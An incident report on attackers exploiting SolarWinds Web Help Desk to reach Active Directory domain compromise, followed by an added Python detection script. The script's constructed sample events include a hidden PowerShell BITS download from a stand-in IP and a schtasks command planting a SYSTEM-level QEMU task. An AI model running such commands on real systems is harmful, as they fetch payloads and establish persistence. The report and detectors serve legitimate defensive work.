Full Report
Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. That said, the Microsoft Defender Security Research Team said it's not clear whether the activity weaponized recently
Analysis Summary
# Incident Report: SolarWinds WHD Exploitation Leading to Domain Compromise
## Executive Summary
Threat actors executed a multi-stage intrusion by exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve initial access via unauthenticated Remote Code Execution (RCE). Following successful exploitation, the attackers moved laterally, leveraging legitimate tools (Living Off The Land) to establish persistence, dump credentials, and perform a DCSync attack, indicating a severe breach potentially leading to full domain compromise. Microsoft observed this activity, which began in December 2025, and is currently investigating whether previously disclosed or recently patched vulnerabilities were used for the initial entry.
## Incident Details
- Discovery Date: Prior to Microsoft's report publication (Activity observed in December 2025).
- Incident Date: Activity observed starting in December 2025.
- Affected Organization: Undisclosed organizations using internet-exposed SolarWinds WHD.
- Sector: Not specified, but the CISA warning mentioned Federal Civilian Executive Branch (FCEB) agencies.
- Geography: Global (Implied by threat intelligence reporting).
## Timeline of Events
### Initial Access
- Date/Time: December 2025 (Start of observed activity)
- Vector: Exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances.
- Details: Successful exploitation led to unauthenticated Remote Code Execution (RCE) within the WHD application context. It is unclear whether CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399 was the vector used.
### Lateral Movement
1. **Payload Delivery:** A compromised WHD instance spawned PowerShell to utilize the Background Intelligent Transfer Service (BITS) for downloading and executing further payloads.
2. **RMM Deployment:** Threat actors downloaded legitimate components associated with Zoho ManageEngine (an RMM solution) to maintain persistent remote control.
3. **Reconnaissance:** Attackers enumerated sensitive domain users and groups, including Domain Admins.
4. **Internal Movement:** Attackers established persistence via reverse SSH and RDP access. They attempted to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account for cover.
5. **Credential Access & Domain Takeover:** Attackers used DLL side-loading (`wab.exe` loading `sspicli.dll`) to dump LSASS memory. Crucially, a **DCSync attack** was executed against a Domain Controller to extract password hashes and sensitive AD information.
### Data Exfiltration/Impact
- Data/Access Stolen: Sensitive domain user and group information, including Domain Admin credentials, and password hashes extracted via DCSync.
- Impact: Potential complete compromise of the Active Directory domain.
### Detection & Response
- How it was discovered: Detected by the Microsoft Defender Security Research Team.
- Response actions taken: Not detailed in the provided text, but CISA ordered FCEB agencies to patch relevant CVEs by Feb 6, 2026. Advisories recommend updating WHD, rotating accounts, and isolating compromised systems.
## Attack Methodology
- Initial Access: Unauthenticated Remote Code Execution (RCE) via SolarWinds WHD vulnerability (Likely CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399).
- Persistence: Reverse SSH, RDP access, and attempting to create a scheduled task launching QEMU.
- Privilege Escalation: Not explicitly detailed. RCE in the WHD application context typically precedes escalation attempts; reaching the SYSTEM account via the scheduled task would imply successful escalation.
- Defense Evasion: Use of legitimate administrative tooling (Zoho ManageEngine RMM) and living-off-the-land binaries (LOLBins) such as PowerShell and BITS, plus an attempt to hide activity inside a QEMU virtual machine.
- Credential Access: LSASS memory dumping via DLL side-loading (`wab.exe` loading `sspicli.dll`).
- Discovery: Enumerating sensitive domain users and groups, including Domain Admins.
- Lateral Movement: Establishing RDP/SSH tunnels; use of RMM tool.
- Collection: Harvesting sensitive AD data via DCSync.
- Exfiltration: Implied via RDP/SSH access established for command and control.
- Impact: Domain compromise via DCSync and credential theft.
## Impact Assessment
- Financial: Not specified.
- Data Breach: Highly sensitive Active Directory data (password hashes, user/group lists, including Domain Admins).
- Operational: High disruption potential due to suspected full domain compromise.
- Reputational: Dependent on the affected entities' public disclosure.
## Indicators of Compromise
- Network indicators: Reverse SSH tunnels, RDP access, and BITS transfers from an external host used to download payloads (no C2 URLs or IP addresses are given in the source).
- File indicators: Zoho ManageEngine components, a rogue `sspicli.dll` placed where `wab.exe` will load it, and QEMU components.
- Behavioral indicators: Use of `wab.exe` for DLL side-loading, DCSync behavior targeted at Domain Controllers, and creation of persistence scheduled tasks executing under SYSTEM.
## Response Actions
- Containment measures: Advisories recommend isolating compromised machines immediately.
- Eradication steps: Advisories recommend finding and removing any unauthorized RMM tools (Zoho ManageEngine components).
- Recovery actions: Advisories recommend rotating all service and administrator accounts.
## Lessons Learned
- Timely patching, especially for internet-facing applications like WHD, is crucial; unpatched vulnerabilities provide a direct path to domain compromise.
- Exposed, single points of failure can lead to catastrophic network-wide breaches.
- Attackers rely heavily on living-off-the-land (LotL) techniques and legitimate tools to maintain low-noise persistence and evade detection.
## Recommendations
- Immediately patch all SolarWinds WHD instances against the known critical vulnerabilities (CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399).
- Implement robust network segmentation to limit lateral movement from compromised edge services.
- Enhance monitoring for anomalous behavior originating from application services, specifically looking for PowerShell execution leveraging BITS, RDP/SSH tunneling, and unusual system account activity.
- Implement solutions to detect and prevent credential dumping (e.g., monitoring LSASS access) and monitor for DCSync-style behavior.
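The monitoring recommendations above, together with the behavioral indicators listed earlier (WHD spawning PowerShell that uses BITS, `wab.exe` side-loading `sspicli.dll`, a SYSTEM scheduled task launching QEMU, and DCSync against a Domain Controller), can be turned into simple detection heuristics. The following Python is an added example written for this page; it is not Microsoft's or SolarWinds' code and not a production rule set. It assumes normalized event dictionaries with the field names shown (an assumption about your telemetry pipeline), that the WHD service runs under a Java process installed below a `\SolarWinds\WebHelpDesk\` path (an assumption about the install layout), and it runs over constructed sample events rather than real logs. The replication-right GUIDs are the documented Active Directory extended rights that a DCSync request must hold and that appear in the Properties field of Security event 4662 on a DC.

```python
"""Added example: heuristics for the behaviours described in the report,
run over constructed sample telemetry (not real logs)."""
import re

# Documented AD extended rights required for directory replication. Their GUIDs
# appear in the Properties field of a Security event 4662 on a domain controller.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: the WHD service runs under a Java host process installed below this
# path fragment; adjust it to the real install path in your environment.
WHD_PATH_HINT = "\\solarwinds\\webhelpdesk\\"
BITS_CMD = re.compile(r"start-bitstransfer|bitsadmin", re.I)
SYSTEM32 = "\\windows\\system32\\"


def check_process(ev):
    """Process-creation event (e.g. Sysmon ID 1 / Security 4688). Field names are assumed."""
    hits = []
    parent, image, cmd = (ev.get(k, "").lower() for k in ("parent", "image", "cmdline"))
    if WHD_PATH_HINT in parent and image.endswith("powershell.exe"):
        hits.append("WHD process spawned PowerShell")
    if image.endswith("powershell.exe") and BITS_CMD.search(cmd):
        hits.append("PowerShell used BITS for a transfer")
    if image.endswith("schtasks.exe") and "/ru system" in cmd and "qemu" in cmd:
        hits.append("scheduled task created to run QEMU as SYSTEM")
    return hits


def check_image_load(ev):
    """Image-load event (e.g. Sysmon ID 7): the legitimate sspicli.dll lives only in System32."""
    image, dll = ev.get("image", "").lower(), ev.get("loaded", "").lower()
    if image.endswith("wab.exe") and dll.endswith("sspicli.dll") and SYSTEM32 not in dll:
        return ["wab.exe loaded a non-System32 sspicli.dll (side-loading)"]
    return []


def check_directory_access(ev):
    """Security event 4662 on a DC. Replication rights requested by anything other
    than a machine account (name ending in '$') is the classic DCSync signal.
    Caveat: a compromised machine account passes this filter, so pair it with an
    allow-list of the real DC computer accounts."""
    account = ev.get("subject", "")
    props = ev.get("properties", "").lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    if rights and not account.endswith("$"):
        return [f"DCSync-style replication request by {account}: {', '.join(rights)}"]
    return []


CHECKS = {"process": check_process, "image_load": check_image_load, "4662": check_directory_access}


def scan(events):
    """Return [(event_id, [reasons])] for every event that trips at least one heuristic."""
    findings = []
    for ev in events:
        reasons = CHECKS.get(ev["type"], lambda e: [])(ev)
        if reasons:
            findings.append((ev["id"], reasons))
    return findings


# Constructed sample telemetry; 203.0.113.0/24 is a documentation-only address range.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "parent": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden Start-BitsTransfer -Source http://203.0.113.5/a -Destination C:\Windows\Temp\a.dat"},
    {"id": 2, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Date"},
    {"id": 3, "type": "image_load", "image": r"C:\Users\Public\wab.exe",
     "loaded": r"C:\Users\Public\sspicli.dll"},
    {"id": 4, "type": "image_load", "image": r"C:\Program Files\Windows Mail\wab.exe",
     "loaded": r"C:\Windows\System32\sspicli.dll"},
    {"id": 5, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /RU SYSTEM /TN Updater /TR "C:\Users\Public\qemu\qemu-system-x86_64.exe"'},
    {"id": 6, "type": "4662", "subject": "jsmith",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 7, "type": "4662", "subject": "DC02$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Events 1, 3, 5 and 6 trip a heuristic; events 2, 4 and 7 are the benign look-alikes (an interactive PowerShell, the real `sspicli.dll` from System32, and DC-to-DC replication by a machine account). The machine-account filter in `check_directory_access` is deliberately coarse: in a real deployment, compare the requesting account against the known list of Domain Controller computer accounts rather than trusting the trailing `$`.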